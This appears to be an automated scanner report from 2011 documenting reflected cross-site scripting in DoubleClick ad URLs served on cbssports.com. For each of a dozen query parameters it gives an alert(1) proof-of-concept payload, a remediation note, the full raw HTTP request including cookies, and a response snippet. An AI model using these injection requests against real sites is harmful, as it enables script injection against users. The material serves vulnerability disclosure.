<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US1f38f"-alert(1)-"85e64b01986&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0 ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8ec7"-alert(1)-"ec811ea4808 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431f8ec7"-alert(1)-"ec811ea4808&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 0%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431f8ec7"-alert(1)-"ec811ea4808&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.2 ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89d47"-alert(1)-"6396b7e7268 was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a89d47"-alert(1)-"6396b7e7268&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... f%3B240390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a89d47"-alert(1)-"6396b7e7268&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.1 ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b749"-alert(1)-"284c75e823e was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=4b749"-alert(1)-"284c75e823e&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... log.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=4b749"-alert(1)-"284c75e823e&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e34b9"-alert(1)-"c75c4a6b53f was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.come34b9"-alert(1)-"c75c4a6b53f&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.come34b9"-alert(1)-"c75c4a6b53f&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbafa"-alert(1)-"4555ba63b5f was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2cbafa"-alert(1)-"4555ba63b5f&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 0296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2cbafa"-alert(1)-"4555ba63b5f&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.24 ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 329f1"-alert(1)-"4602bfcd0de was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com329f1"-alert(1)-"4602bfcd0de&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 72%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com329f1"-alert(1)-"4602bfcd0de&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; v ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f20"-alert(1)-"5e0c335e6a0 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M12f20"-alert(1)-"5e0c335e6a0&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... t=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M12f20"-alert(1)-"5e0c335e6a0&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c9ce"-alert(1)-"2ecdc88be42 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=3c9ce"-alert(1)-"2ecdc88be42&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 1862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=3c9ce"-alert(1)-"2ecdc88be42&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18. ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77531"-alert(1)-"44f2f7f79cf was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=10077531"-alert(1)-"44f2f7f79cf&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 0009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=10077531"-alert(1)-"44f2f7f79cf&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/ ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fa1d"-alert(1)-"0003816d0c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=9fa1d"-alert(1)-"0003816d0c&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=9fa1d"-alert(1)-"0003816d0c&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlCl ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a48fa"-alert(1)-"74ddc92bd84 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866a48fa"-alert(1)-"74ddc92bd84&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 07-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866a48fa"-alert(1)-"74ddc92bd84&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=201 ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f12e"-alert(1)-"b0679799619 was submitted in the ra parameter. This input was echoed unmodified in the application's response.
